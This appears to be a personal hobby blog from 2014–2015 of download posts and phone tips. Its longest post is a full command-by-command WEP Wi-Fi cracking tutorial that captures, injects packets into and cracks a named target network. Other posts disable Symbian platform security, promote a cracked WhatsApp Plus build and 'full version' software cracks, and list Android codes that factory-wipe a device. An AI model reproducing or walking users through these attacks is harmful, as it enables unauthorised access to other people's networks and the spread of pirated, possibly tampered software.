Sunday, 14 December 2014

Visual Basic 2008 Black Book






Visual Basic 2008 Black Book: This Book Will Help You to Learn Basic to Master in VB .net In This Book The All Needed Code Is Ready Made Available So You Can Develop...

Saturday, 6 December 2014

Data Communication And Network

Here I have Upload Some PPT File For BCA Guys

If you like my work than plzzz share with other

Password :  Asaraf.lov@gmail.com



Click Here For Download

Saturday, 22 November 2014

AAA Logo Maker

AAA Logo Maker Is Used develop your own Logo

If You Are Designer Or Programmer Than This Software will Help you  To Make Your Own Logo



                           
     In First Form Some Logo Available You Can Choose                                
     From Them And After That You Can Modify Logo



                       
                                      
Click Here For Download



  

Monday, 10 November 2014

Android Hacking Code

Hello Friends

here i have upload some code which is used for some android Device information by using code actually it's not hack but it's fun so Enjoy with little hacking 



Thanxxx


Secret Code
Purpose of Use
*#*#4636#*#*
Displays useful information regarding the
mobile phone. Following Menus are Displayed using this secret code:
  • Phone information
  • Battery information
  • Battery history
  • Usage statistics
  • Wifi information
*#*#7780#*#*
Secret code to Factory Reset any Android Mobile Phone. This code will reset and remove following data:
  • Google account settings stored in the phone
  • System and application data and settings
  • All Downloaded applications
This code will not format or erase following:
  • Current system software and bundled applications
  • Files and data stored in the external SD card.
*2767*3855#
Secret code to factory format any Android mobile phone. It will format and remove all data, files and settings of the mobile phone and the internal memory. It will also reinstall the phone firmware.
This is a very risky secret code and must be used very wisely only when required or when no other option is left. Once this code is given, the operation cannot be stopped. It may be stopped by removing the battery but it may cause other troubles.
*#*#34971539#*#*
Secret code to get information about camera of the mobile phone. When this code is given, following menus will appear on the screen:
1.     Update camera firmware in image
2.     Update camera firmware in SD card
3.     Get camera firmware version
4.     Get firmware update count
Select the required menu for related information. It is suggested not to use the first menu to update camera firmware or the camera might stop working.
*#*#7594#*#*
This secret code is used to change the “End Call / Power” button option.
*#*#273283*255*663282*#*#*
This code will open a File copy screen to backup media files like videos, music and sound, photos / images etc.
*#*#197328640#*#*
This code is used to enter into service mode to run different tests and change settings.
WLAN, GPS and Bluetooth Secret Codes
*#*#232339#*#*
OR 
*#*#526#*#* 
OR 

*#*#528#*#*
WLAN Test
*#*#232338#*#*
Displays WiFi MAC Address
*#*#1472365#*#*
OR
*#*#1575#*#*
GPS Test
*#*#232331#*#*
Bluetooth Test
*#*#232337#*#
To Display Bluetooth Device Address
*#*#8255#*#*
Tolaunch GTalk Service Monitor.
Useful Secret Codes for Factory Tests
*#*#0*#*#*
LCD Test
*#*#0673#*#*
OR
*#*#0289#*#*
Melody Test
*#*#0283#*#*
Packet Loop Back
*#*#0842#*#*
Vibrator and Backlight Test
*#*#2663#*#*
Touch Screen Version
*#*#2664#*#*
Touch Screen Test
*#*#0588#*#*
Proximity Sensor Test
*#*#3264#*#*
RAM Version


Thursday, 21 August 2014

How to Change Background Image In Windows 7

you can by regedit but it is not safe so here i have upload one application which is help to change a image simple application just you need to select  image and  after that cloase


finish ............



               
Click Here For Download

Friday, 1 August 2014

Whatsapp Plus Update 19/09/2015 (Solved Band Problem) with new original

Now You Can Hide Your Status By Using This Crack Virsion



Instructions to install Whatsapp Plus v2.10

* First backup your entire chat conversations by pressing the option button,
* Path Settings > Chat Settings > Backup Conversations.
   Then uninstall the older whatsapp you have downloaded from Google Play Store andinstall only
    Whatsapp Plus APK.
* Click the ‘Agree’ option and continue.
* Next step is to restore all your conversations by just clicking the ‘Restore’ option. Now you have
    restored  all your chat conversations successfully.
* Now wait for a while and press continue.
* From Menu button choose the Hide Online status option to hide your status from friends.
* That’s it; enjoy the Last seen hiding feature in your android Smartphone.







Guys if you have any problem with this version don't upadate online by manually
You can update here I have uploaded new version.     ENJOY...... 



Here official whatsapp plus with offline working available here , there is many other service available in this whatsapp plus

Now call ui Enable in whatsapp plus so enjoy calling feature and share our blog to other your friends for improve our site

some people ask me about how to open rar file in android so just download xplore from play store
and install it


New update available now you can download here this update has been back with old and great facility you can seen online in contact also online toste and much more if you like my work please share with other and if you want any help then please comment 


Now some people ask me how to open in android device i can understand some device has no facility to open rar file so here i have uploaded x plore for open any rar file and the great file manager application so you can download here DOWNLOAD


Last update on 01/12/2015 (latest whatsapp plus)



MEDIAFIRE


Saturday, 26 July 2014

SOLVE CERTIFICATE ERROR IN NOKIA N73

Hack Nokia N73 to install unsigned apps (solve certificate error)

Ok, first of all, you must know why you need to hack your symbian phone.



Had you ever experience getting “certificate error” when trying to install software or game on your symbian phone? The “certificate error” is blocking you from installing all those great applications and games which will greatly enhance your symbian phone experiences. Without 3rd party applications, symbian phone is nothing more than an ordinary phone.
Hacking your phone is quite safe nowadays and you can do it in just few minutes.
The following tutorial is 100% working with Nokia N73 [4.0839.42.2.1] tested by myself.
First you need 4 files
CProfDriver_SISX.ldd
Installserver.exe
Secman v1.10.sis
X-plore v1.34


Easy steps to Hack/unlock your N73
1. Download the file and unzip to your pc.
2. Transfer the 4 files to your phone memory card.
3. Install Secman v1.10.sis. When the installation is done, look in the Applications folder on your phone, and find Secman. Open it and wait to load. Follow the instruction and it will auto reboot your phone.
4. Open it again and click on “Install Root Certificate”. After that now Select turn platform security off.
5. Install X-plore v1.34 . 
Open X-plore. First start to configuration of xplore which can be found on:
Menu>tools>configuration Or by just pressing 0



Please make sure the following option is tick:
Select Show Hidden files
Select Show Romdrives
Select Show Ram drives
Select Show system files/Folders
6. If All ready then continue! By using x-plore
Go to C:
Access c:\sys
copy the files CProfDriver_SISX.ldd and Installserver.exe to C:\sys\bin
Now your phone is Hacked! Thats all, very fast,easy and simple! You are now ready to install any sis file which u know there is no expired certificates,no certificate errors again! just install anything u want!!!
This tutorial might be working for other phone in the list. I have not tried yet, if you successfully hack any phone in the list using my method, please let me know. Thanks.
Pre-FP1 devices:
——————-
Nokia N77
Nokia E61i
Nokia E65
Nokia N93i
Nokia N91 8GB
Nokia E62
Nokia E50
Nokia 5500
Nokia N93
Nokia N73
Nokia N80
Nokia N71
Nokia N92
Nokia E70
Nokia E60
Nokia E61
Nokia 3250



Hope You Enjoyed this tutorial ,For further Doubts and clarifications please pass your comments

HACK ANY APPLICATION TO FULL VERSION

ACTUALLY GUYS 
IT WILL TAKE LONG TIME DESCRIBE SO I HAVE DOWNLOAD  ONE VIDEO IN A FILE SO DOWNLOAD THAT FILE SHOW HOW TO DO 

Hope You Enjoyed this tutorial ,For further Doubts and clarifications please pass your comments

ENJOY .......

Download

HOW TO HACK WIFI USING BACKTRACK

Requirements :-
Here is what you would require to crack a WEP key:

1. Backtrack or any other Linux distro with aircrack-ng installed 

2. A Wifi adapter capable of injecting packets , For this tutorial I will use Alfa AWUS036H which is a very popular card and it performs well with Backtrack

You can find compatible wifi card lists here.


Procedure :-
First Login to your Backtrack / Linux distro and plug in your Wifi adpter , Open a new konsole and type in the following commands 

ifconfig wlan0 up




where wlan0 is the name of the wireless card ,it can be different .To see all wireless cards connected to your system simply type in " iwconfig ".


Putting your WiFi Adapter on Monitor Mode

To begin, you’ll need to first put your wireless adapter into monitor mode , Monitor mode is the mode whereby your card can listen to every packet in the air , You can put your card into monitor mode by typing in the following commands 

airmon-ng start (your interface)

Example :- airmon-ng start wlan0




Now a new interface mon0 will be created , You can see the new interface is in monitor mode by entering "iwconfig mon0" as shown




Finding a suitable Target

After putting your card into monitor mode ,we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command

airodump-ng mon0




Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type.

Now look out for a wep protected network In my case i’ll take “linksys “ as my target for rest of the tutorial


Attacking The Target
Now to crack the WEP key you'll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands

airodump-ng mon0 --bssid -c (channel ) -w (file name to save )




As my target is broadcasted in channel 6 and has a bssid "98:fc:11:c9:14:22" ,I give in the following commands and save the captured data as "RHAWEP"

airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP



Using Aireplay to Speed up the cracking
Now you’ll have to capture at least 20,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then start capturing the data packets but this method is very slow, it can take days or even weeks to capture that many data packets

The second method would be an (active attack )this method is fast and only takes minutes to generate and inject that many packets .

In an active attack you'll have do a Fake authentication (connect) with the AP ,then you'll have to generate and inject packets. This can be done very easily by entering the following commands 

aireplay-ng - 1 3 -a (bssid of the target ) (interface) 




In my case i enter the following commands 

aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0 


After doing a fake authentication ,now its time to generate and inject Arp packets . To this you'll have to open a new Konsole simultaneously and type in the following commands

aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface)




In my case i enter
aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0

If this step was successful you'll see Lot of data packets in the airodump capture as shown




Wait till it reaches 20000 packets , best would be to wait till it reaches around 80,000 to 90,000 packets .Its simple more the packets less the time to crack .Once you’ve captured enough number of packets, close all the process's by clicking the into mark which is there on the terminal



Cracking WEP key using Aircrack

Now its time crack the WEP key from the captured data, Enter the following commands in a new konsole to crack the WEP key

aircrack-ng (name of the file )

In my case i enter 
aircrack-ng RHAWEP-0.1-cap

With in a few minutes Aircrak will crack the WEP key as shown




Once the crack is successful you will be left with the KEY! Remove the colons from the output and you’ll have your WEP Key.

Hope You Enjoyed this tutorial ,For further Doubts and clarifications please pass your comments

THIS POST IS SPECIALLY FOR MEWS STUDENT

                        THIS POST IS SPECIALLY FOR MEWS STUDENT                           

IF ANY FILE PROTECTED BY PASSWORD THAN PASSWORD IS                                           asarafpankheriya.blogspot.in


I will try to always update new data and if you have any question you can ask   


Thanxxx

Windows Say Your Name (For Fun)

THIS IS A SCRIPT FILE FOLLOW STEP

STEP 1 ; click on start button 

STEP 2 ; click on all program

STEP 3 ; scroll down and find startup folder

STEP 4 ; right click on the folder and select open option

STEP 5 ; paste that file there !!  thats it


IF YOU WANT TO CHANGING LIKE YOU WANT TO YOUR NAME LIKE ... james 

so follow my step

STEP 1 ; right click on the on that file and select option EDIT option

STEP 2 ; change second line ( speaks="Welcome Mr asaraf" )

STEP 3 ; Here I have write welcome Mr asaraf  DELET  it and write whatevar you want and SAVE it

thats it 


Click Here For Download


ENJOY ........  


How To Root Samsung J200F

Hey, Guys After Many Try I Got Original File For Rotting Samsung J200F You Can Easily Root With This File I Don't Think That All Descri...